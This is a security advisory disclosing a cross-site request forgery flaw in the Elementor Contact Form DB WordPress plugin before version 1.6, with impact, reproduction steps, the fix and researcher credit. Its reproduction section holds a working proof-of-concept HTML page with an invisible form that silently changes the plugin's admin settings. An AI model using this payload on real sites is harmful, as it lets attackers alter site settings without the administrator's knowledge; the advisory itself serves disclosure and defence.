Summary

Affected versions of the “Elementor Contact Form DB” plugin for WordPress are vulnerable to a Cross-Site Request Forgery (CSRF) attack.

Product

Elementor Contact Form DB Wordpress plugin before 1.6

Impact

An admins that visits a malicious site could change The Elementor-Contact-Form-DB setting without his/her knowledge.

Steps to reproduce

  1. Wordpress with vulnerable Elementor Contact Form DB plugin installed
  2. Admin visits the page:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    <html><head></head>
    <body>
    <form style="opacity: 0;" action="http://[site-url]/wp-admin/edit.php?post_type=elementor_cf_db&page=sb_elem_cfd_settings" method="POST">
    <input type="number" name="sb_elem_cfd[disable_admin_nag]" value="1" />
    <input type="text" name="sb_elem_cfd[records_min_role]" value="lfb_role" />
    <input type="text" name="sb_elem_cfd_save" value="Save Settings" />
    <button>submit</button>
    </form>

Expected result:

Admin setting page will change according to the attacker’s input.

Remediation

Update Elementor-Contact-Form-DB to 1.6 or above.

Credit

This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.

Resources

  1. Changeset